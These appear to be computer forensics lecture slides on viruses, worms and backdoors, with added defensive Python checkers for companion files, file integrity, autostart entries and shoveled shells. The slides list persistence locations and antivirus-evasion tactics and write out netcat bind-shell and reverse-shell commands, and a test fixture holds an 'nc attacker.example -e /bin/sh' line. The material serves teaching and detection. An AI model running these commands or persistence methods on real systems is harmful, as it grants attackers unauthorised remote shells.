Viruses, Worms, Mobile Code
COEN 252: Computer Forensics

Viruses: The Principle
• A virus attaches itself to a host that can execute the instructions contained in the virus.
• When the host is invoked, the virus copies itself to other locations on the system.
Executables
• Companion Infection Technique
  • The OS calls the virus when the user requests the companion file.
  • Windows:
    • The virus is Notepad.com, hiding behind Notepad.exe.
    • The hidden attribute is set so the virus is not seen in listings.
    • The virus launches the true Notepad.exe.
    • If the user selects Start > Run and types notepad, Windows starts the virus (Notepad.com instead of Notepad.exe).
Executables
• Companion Infection Technique
  • Windows:
    • The virus renames Notepad.exe to Notepad.ex_ and hides it.
    • The virus takes the place of Notepad.exe.
    • Works with shortcuts.
    • Used in the Trilisa virus/worm (2002).

Executables
• Companion Infection Technique
  • The virus uses the alternate data stream feature of NTFS:
    • Streams look like one file in Explorer and directory listings.
    • The system activates the default stream, which is the virus.
    • The virus then calls the alternate stream.
    • Win2KStream virus (2000).
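A forensic check for the companion techniques on the three slides above, written as an added example (not the lecture's own code): given a directory listing it reports a `.com` that would be resolved before an `.exe` of the same stem under the default Windows PATHEXT order, and an `.ex_` backup left beside a replaced `.exe`. The listing is constructed; `scan_dir` runs the same check on a real directory.

```python
import os

# Default PATHEXT order on Windows: when a bare name is run, earlier
# extensions win, so name.com is started instead of name.exe.
PATHEXT = [".com", ".exe", ".bat", ".cmd"]
# Leftover of the rename-and-replace variant (Notepad.exe -> Notepad.ex_).
BACKUP_EXTS = [".ex_"]

def find_companions(names):
    """Return (finding, planted, shadowed) triples for suspicious pairs.

    'shadow': a file with an earlier-PATHEXT extension shares its stem with
    an .exe and would be launched in its place.
    'renamed': an .ex_ backup sits beside an .exe of the same stem.
    Matching is case-insensitive, as on Windows file systems.
    """
    by_stem = {}
    for name in names:
        stem, ext = os.path.splitext(name)
        by_stem.setdefault(stem.lower(), {})[ext.lower()] = name
    findings = []
    for stem in sorted(by_stem):
        exts = by_stem[stem]
        if ".exe" not in exts:
            continue
        exe = exts[".exe"]
        for ext in PATHEXT[:PATHEXT.index(".exe")]:
            if ext in exts:
                findings.append(("shadow", exts[ext], exe))
        for ext in BACKUP_EXTS:
            if ext in exts:
                findings.append(("renamed", exts[ext], exe))
    return findings

def scan_dir(path):
    """Run the check over the real files in one directory.
    os.listdir also returns entries carrying the hidden attribute, so a
    hidden companion is still reported."""
    return find_companions(os.listdir(path))

# Constructed listing: notepad.com shadows Notepad.exe, calc.ex_ is the
# hidden original of a replaced calc.exe, cmd.exe is clean.
SAMPLE_LISTING = ["Notepad.exe", "notepad.com", "calc.exe", "calc.ex_", "cmd.exe"]
```

The ADS variant cannot be seen this way: alternate streams do not appear in a plain listing, so that check needs a stream-aware tool.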
Executables
• Overwriting Techniques
  • The virus replaces part of an executable.
  • Usually the executable loses functionality.
  • Users will know that something is wrong.
• Prepending Techniques
  • The virus is placed in front of the executable.
  • After the virus executes, the host program is called.
  • Very easy for .com files.
  • Easy to clean files.
  • The Bliss virus had a disinfect mode built into it.
  • Used by the NIMDA worm.

Executables
• Appending Infection Technique
  • The virus inserts itself at the end of the host file.
  • It adds a jump at the beginning of the host file.
• Stealth Techniques for Prepending and Appending:
  • Compress the host.
  • When the virus calls the host, the host is uncompressed into RAM.
  • Pad the total package (virus plus compressed host) to the same size as the original host.
  • Choose the filler so that the checksum is not changed.
Boot Sector Modification
• Target: the Master Boot Record or a Partition Boot Sector.
• Michelangelo Virus (1991).
  • Relocated the MBR boot strap code elsewhere on the disk.
  • First the virus loads itself into memory, then it passes control to the original MBR boot sector.
  • Places itself into the boot sector of every floppy.
  • The memory-resident copy of the virus attaches itself to low-level BIOS drivers.
  • It gets called when these are executed.
  • Can no longer spread under WinNT, Win2K, WinXP; it can only wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.
Infection of Document Files
• Many applications use macros:
  • MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, …
• WinOffice runs code in subroutines such as:
  • Document_Open()
  • Document_Close()
  • AutoExec()
  • …
• A virus can copy itself to the victim's Normal.dot file.
• The Normal.dot file is processed whenever WinOffice starts.
Other Targets
• Source code
• Scripts
  • Visual Basic Scripts (.vbs) used by the OS:
    • Startup.vbs
    • Exec.vbs
  • Shell scripts, Perl scripts
• Java class files
  • Platform-independent viruses

Propagation Techniques
• Removable storage
  • Boot sector viruses, executable viruses
  • Yamaha's CD-R drive firmware update contained the Chernobyl virus.
• Email attachments
• Shared directories

Anti-Virus Defense
• Antivirus software on gateways:
  • User workstations
  • File servers
  • Mail servers
  • Application servers
  • Border firewalls
  • Handhelds
Anti-Virus Defense
• Virus signatures
  • Look for small patterns indicative of a known virus.
  • Polymorphic viruses
• Heuristics
  • Look for programs with bad behavior:
    • Attempts to access the boot sector
    • Attempts to locate all files in a directory
    • Attempts to write to an .exe file
    • Attempts to delete hard drive contents
    • …

Anti-Virus Defense
• Integrity Verification
  • Generate a database of hashes of important files.
  • Recalculate these hashes and compare them to the known values.
• Configuration Hardening
  • Least privilege
  • Minimize active components.
  • Set warnings (e.g. against macros)
• User education
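The integrity-verification defense above, as an added example rather than the lecture's own tool: build a SHA-256 baseline of a directory, then re-hash and report additions, deletions and changes. Because SHA-256 is collision-resistant, the filler trick from the appending slide (padding so a simple checksum is unchanged) does not defeat it. `demo()` stages a constructed scenario in a throwaway directory so the whole thing runs offline.

```python
import hashlib
import os
import tempfile

def hash_file(path: str) -> str:
    """SHA-256 of one file, read in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root: str) -> dict[str, str]:
    """Map each regular file under root (path relative to root) to its hash."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = hash_file(full)
    return baseline

def compare(old: dict[str, str], new: dict[str, str]) -> dict[str, list[str]]:
    """Report files added, removed, or changed since the stored baseline."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
    }

def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline two fake executables, then mimic a
    prepending infection, a dropped companion file and a deleted file,
    and re-check against the baseline."""
    with tempfile.TemporaryDirectory() as root:
        for name, data in {"notepad.exe": b"MZ-host", "calc.exe": b"MZ-calc"}.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)
        baseline = build_baseline(root)
        with open(os.path.join(root, "notepad.exe"), "wb") as f:
            f.write(b"VIRUS" + b"MZ-host")   # virus placed in front of the host
        with open(os.path.join(root, "notepad.com"), "wb") as f:
            f.write(b"VIRUS")               # companion file
        os.remove(os.path.join(root, "calc.exe"))
        return compare(baseline, build_baseline(root))
```

The baseline must be stored where the infected system cannot rewrite it (read-only media or a separate host), otherwise a virus that updates the hashes as it spreads defeats the check.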
Anti-Anti-Virus Defense
• Stealthing
  • Hide virus files.
  • Intercept scanning of infected files.
  • Slow the rate of infection.
  • …
• Polymorphism and Metamorphism
  • Change the order of instructions in the virus code.
  • Use equivalent code (e.g. incrementing = subtracting -1).
  • Encrypt most of the virus body.
  • Slightly change the functionality of the virus as it spreads.

Anti-Anti-Virus Defense
• Antivirus software deactivation
  • Kill processes known to be antivirus processes.
  • Disable internet access to the antivirus vendor's pages.
  • Change security settings (e.g. allow Word macros to run).
Worms
Worm:
• Propagates across a network.
• Typically does not require user action for propagation.
Virus:
• Infects files.
• Typically requires user interaction.

Worm Components
• Warhead
• Propagation Engine
• Target Selection Algorithm
• Scanning Engine
• Payload
Worm Warhead
• A piece of code that exploits a vulnerability on the target system.
• Exploits such as:
  • Buffer overflow exploits
  • File sharing attacks
  • E-mail
  • Common misconfigurations

Worm Propagation Engine
• After gaining access, the worm must transfer itself to the target machine.
• Some worms are completely contained in the warhead.
• File transfer mechanisms:
  • FTP
  • TFTP
  • HTTP
  • SMB (MS Server Message Block)
    • Windows file sharing
    • Unix servers running Samba

Worm Target Selection Algorithm
• Once the worm has gained control of a target, it starts looking for new targets:
  • E-mail addresses
  • Host lists
  • Trusted systems
  • Network Neighborhood
  • DNS queries
  • Randomly selected IP addresses

Worm Scanning Engine
• Once targets are identified, the worm scans them for the original vulnerability.

Worm Payload
• Some specific action done on behalf of the attacker:
  • Opening up a backdoor.
  • Planting a distributed denial of service attack.
  • Performing complex calculations:
    • Password cracking
    • Math research (actually happened)
Worm Spread
• Worm spread is limited by:
  • Diversity of machines
    • A tiny worm that targeted only machines running security software from a medium-sized company was successful in infecting most of them.
    • Worms can contain support for multiple entry methods.
  • Too many victims crash.
  • Fast worms can cause network congestion.

Worm Trends
• Multiplatform worms
• Multi-exploit worms
• Zero-day exploit worms
  • No chance to patch
• Fast-spreading worms: Warhol / Flash
  • Pre-scan targets
• Polymorphic worms
  • Change appearance
• Metamorphic worms
  • Change functionality

Worm Defenses
• Ethical (?) worms
• Antivirus tools
• Fast patching services
• Firewalling
  • Block arbitrary outbound connections
  • Prevents spreading
• Establishment of incident response capabilities
Backdoors
Backdoor: A program that allows attackers to bypass normal security controls on a system, gaining access to which they are not entitled.

Backdoor Types
• Local escalation of privilege
• Remote execution of individual commands
• Remote command-line access
• Remote control of the GUI

Backdoor Installation
• The attacker has compromised the system.
• A virus, worm, or malicious mobile code installs the backdoor.
• Social engineering: tricking the victim into installing the backdoor.
• ...

Starting backdoors automatically
The attacker wants to maintain access to the system.
• The backdoor needs to restart whenever the system restarts.
• Methods are OS dependent.
Starting backdoors automatically on Windows
• Altering startup files and folders
• Registry
• Task Scheduler

Starting backdoors automatically on Windows
• Startup folders and files
  • Autostart folders for individual users and for all users.

Starting backdoors automatically on Windows
Use:
• win.ini
• system.ini
  • Modify "shell=explorer.exe" on Win9x
• wininit
• winstart.bat (Win9x)
• Autoexec.bat (Win9x)
• Config.sys (Win9x)
Starting backdoors automatically on Windows
• Registry keys start programs on login or reboot:
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
    • RunServicesOnce
    • RunServices
    • RunOnce
    • Run
    • RunOnceEx

Starting backdoors automatically on Windows
  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\
    • RunServicesOnce
    • RunServices
    • RunOnce
    • Run
    • RunOnceEx
Starting backdoors automatically on Windows
• Registry keys start programs on login or reboot:
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
  • HKLM\SOFTWARE\Policies\Microsoft\Windows\System\
    • Scripts
    • Explorer\Run

Starting backdoors automatically on Windows
• Registry keys start programs on login or reboot:
  • HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
  • HKCU\SOFTWARE\Policies\Microsoft\Windows\System\
    • Scripts
    • Explorer\Run

Starting backdoors automatically on Windows
• Registry keys start programs on login or reboot:
  • HKCR\Exefiles\Shell\Open\Command
    • Indicates programs that will be run every time another .exe is run.

Starting backdoors automatically on Windows
• Use the Task Scheduler.
• Check scheduled tasks and the other autostart locations with Autoruns from Sysinternals.
Starting backdoors automatically on Unix
• Modifying the init daemon
• Modifying system and service initialization scripts
• Modifying the internet daemon configuration
• Changing user startup scripts
• Scheduling jobs with cron

Starting backdoors automatically on Unix
• Modify the init daemon
  • The init daemon is the first process to start.
  • It uses /etc/inittab to find other processes that need to be started.
  • The attacker merely adds a line to inittab.

Starting backdoors automatically on Unix
• Modify system and service initialization scripts
  • About 20+ system scripts
  • Located in /etc/rc.d or /etc/init.d
  • Or merely plant a backdoor in the initialization script of another service.
    • E.g. the ppp daemon
      • for PPP modem dial-up connections
  • inetd
    • network daemon
    • change /etc/inetd.conf

Starting backdoors automatically on Unix
• Adjust user startup scripts
  • .login
  • .cshrc
  • /etc/profile
  • .logout
  • .xinitrc
  • .xsession

Starting backdoors automatically on Unix
• Schedule jobs with cron
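An audit pass over the autostart locations from the Windows and Unix slides above, added here as an example and not part of the lecture: it pulls the command out of inittab, inetd.conf and system-crontab entries (and takes Run-key value data as-is) and flags programs started from scratch or home directories, hidden paths, a bare shell registered as an inetd server, or netcat run with `-e`. The four excerpts are constructed; the heuristics are assumptions about what a legitimate service looks like, so hits are leads to review, not verdicts.

```python
# Unix dirs a legitimate service is not normally started from; Windows
# equivalents for Run-key values (matched case-insensitively).
UNIX_SCRATCH = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
WIN_SCRATCH = ("\\temp\\", "\\downloads\\")
SHELLS = ("/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh")

def command_from(kind: str, line: str) -> str:
    """Extract the program invocation from one entry ('' for blanks/comments)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return ""
    if kind == "inittab":   # id:runlevels:action:process
        return line.split(":", 3)[3] if line.count(":") >= 3 else ""
    if kind == "inetd":     # service socket proto wait user server args...
        return " ".join(line.split()[5:])
    if kind == "cron":      # min hour dom mon dow user command (system crontab)
        return " ".join(line.split()[6:])
    if kind == "runkey":    # registry value data is already a command line
        return line
    raise ValueError(f"unknown entry kind {kind!r}")

def is_suspicious(kind: str, cmd: str) -> bool:
    """Scratch/home/hidden paths, a bare shell as inetd server, or netcat -e."""
    tokens = cmd.split()
    if not tokens:
        return False
    prog, base = tokens[0], tokens[0].rsplit("/", 1)[-1]
    if prog.startswith(UNIX_SCRATCH) or "/." in prog:
        return True
    if any(d in prog.lower() for d in WIN_SCRATCH):
        return True
    if kind == "inetd" and prog in SHELLS:
        return True
    return base in ("nc", "netcat") and "-e" in tokens

def audit(kind: str, text: str) -> list[tuple[int, str]]:
    """Return (line number, command) for each suspicious entry in text."""
    return [(n, c) for n, line in enumerate(text.splitlines(), 1)
            if (c := command_from(kind, line)) and is_suspicious(kind, c)]

# Constructed excerpts; only the planted entries should be reported.
INITTAB = "si::sysinit:/etc/rc.d/rc.sysinit\nbd:3:respawn:/tmp/.x/bd -l -p 2000\n"
INETD = ("ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd\n"
         "ingreslock stream tcp nowait root /bin/sh sh -i\n")
CRONTAB = ("17 * * * * root cd / && run-parts /etc/cron.hourly\n"
           "*/5 * * * * root /var/tmp/.cache/update.sh\n"
           "0 3 * * * root /usr/bin/nc attacker.example 80 -e /bin/sh\n")
RUNKEY = ("C:\\Windows\\system32\\ctfmon.exe\n"
          "C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe\n")
```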
Backdoor Defenses
• System integrity tools like Tripwire

Backdoor with netcat
• netcat compiles into the executable nc.
• On the victim:
  • nc -l -p 2000 -e cmd.exe (Windows)
  • nc -l -p 2000 -e /bin/sh (Unix)
  • Sets up a listener on port 2000.
• On the attacker:
  • nc [victim address] 2000
  • Gives a command shell.
Backdoor with netcat
• Only works if the attacker can establish a TCP connection to the port on the victim.
• Firewalls can block this.

Backdoor with netcat
• Use an open door in the firewall:
  • Shoveling a shell
  • On the attacker's machine:
    • nc -l -p 80
    • netcat listener on port 80
  • On the victim's machine:
    • nc [attacker's address] 80 -e cmd.exe
    • initiates an outgoing connection to the attacker
    • then executes a shell
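The host-side counterpart to the shoveled shell above, added as an example that is not from the lecture: the outbound connection goes to a port the firewall allows (80 here), so the telling sign is the owning process, not the port. The parser assumes the column layout of Linux `ss -tnp`; the listing is constructed.

```python
import re

# Processes that should not normally own an established outbound TCP socket.
# netcat -e hands its socket to the spawned shell, so either name can show up.
SHELL_LIKE = {"nc", "netcat", "ncat", "sh", "bash", "dash", "cmd.exe", "powershell.exe"}
# The users:(("name",pid=N,fd=M)) column printed by `ss -tnp`.
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')

def parse_ss_line(line: str) -> dict[str, str]:
    """Split one `ss -tnp` row into state/local/peer/proc/pid; {} for header or junk."""
    parts = line.split()
    if len(parts) < 5 or parts[0] == "State":
        return {}
    m = PROC_RE.search(line)
    return {"state": parts[0], "local": parts[3], "peer": parts[4],
            "proc": m.group(1) if m else "", "pid": m.group(2) if m else ""}

def find_shoveled_shells(listing: str) -> list[dict[str, str]]:
    """Established sockets owned by a shell-like process, whatever the peer port."""
    hits = []
    for line in listing.splitlines():
        row = parse_ss_line(line)
        if row and row["state"] == "ESTAB" and row["proc"] in SHELL_LIKE:
            hits.append(row)
    return hits

# Constructed `ss -tnp` output: the browser on 443 and sshd listening are
# fine; nc and a shell, both connected out to port 80, are the shoveled shell.
SAMPLE_SS = """State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:51234 198.51.100.9:443 users:(("firefox",pid=2210,fd=55))
ESTAB 0 0 10.0.0.5:51240 192.0.2.44:80 users:(("nc",pid=3107,fd=3))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=811,fd=3))
ESTAB 0 0 10.0.0.5:51251 192.0.2.44:80 users:(("sh",pid=3108,fd=0))
"""
```

The same idea on Windows is `netstat -bno`, which prints the owning executable and PID for each connection.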
Alternatives to netcat
• cryptcat
• Tini
• Q
• Bindshell
• Md5bd
• UDP_Shell
• TCPshell
• Crontab-backdoor